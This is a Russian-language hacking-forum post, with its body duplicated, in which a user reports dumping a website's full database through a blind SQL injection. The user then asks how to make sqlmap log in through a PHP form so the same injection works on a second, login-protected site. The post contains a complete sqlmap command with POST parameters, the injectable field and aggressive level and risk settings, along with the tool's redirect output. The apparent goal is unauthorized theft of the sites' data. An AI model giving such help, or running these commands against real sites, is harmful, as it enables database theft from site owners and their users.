vikler
05.07.2014, 18:45
В общем, дела обстоят так. Нашла уязвимый параметр на одном сайте. Оказалось
Code:
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Слила всю информацию, всё шикарно
Но есть ещё другой сайт на таком же движке. Но чтобы в него зайти, необходима авторизация через php форму. У меня есть логин/пасс к этому второму сайту. Зашла и "внутри" обнаружила, что уязвимость точно такая же как у открытого сайта есть.
Теперь вопрос: как авторизоваться через sqlmap нормально, чтобы слить уже данные для второго закрытого сайта?
При вводе
Code:
./sqlmap.py -u "........../index.php" --auth-type Basic --auth-cred 'username:password' -v 3 --data="param1=1¶m2=2¶m3=3¶mvuln=injecthere" -p paramvuln --level 3 --risk 3 --dbms="MySQL 5"
Ответ
Code:
sqlmap got a 302 redirect to '......./index.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
и дальше уже такое впечатление, что он до нужной локации с уязвимым параметром paramvuln не доходит (на открытом сайте всё раскручивалось ну ооооч быстро)
Помогите плиз
Code:
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Слила всю информацию, всё шикарно
Но есть ещё другой сайт на таком же движке. Но чтобы в него зайти, необходима авторизация через php форму. У меня есть логин/пасс к этому второму сайту. Зашла и "внутри" обнаружила, что уязвимость точно такая же как у открытого сайта есть.
Теперь вопрос: как авторизоваться через sqlmap нормально, чтобы слить уже данные для второго закрытого сайта?
При вводе
Code:
./sqlmap.py -u "........../index.php" --auth-type Basic --auth-cred 'username:password' -v 3 --data="param1=1¶m2=2¶m3=3¶mvuln=injecthere" -p paramvuln --level 3 --risk 3 --dbms="MySQL 5"
Ответ
Code:
sqlmap got a 302 redirect to '......./index.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
и дальше уже такое впечатление, что он до нужной локации с уязвимым параметром paramvuln не доходит (на открытом сайте всё раскручивалось ну ооооч быстро)
Помогите плиз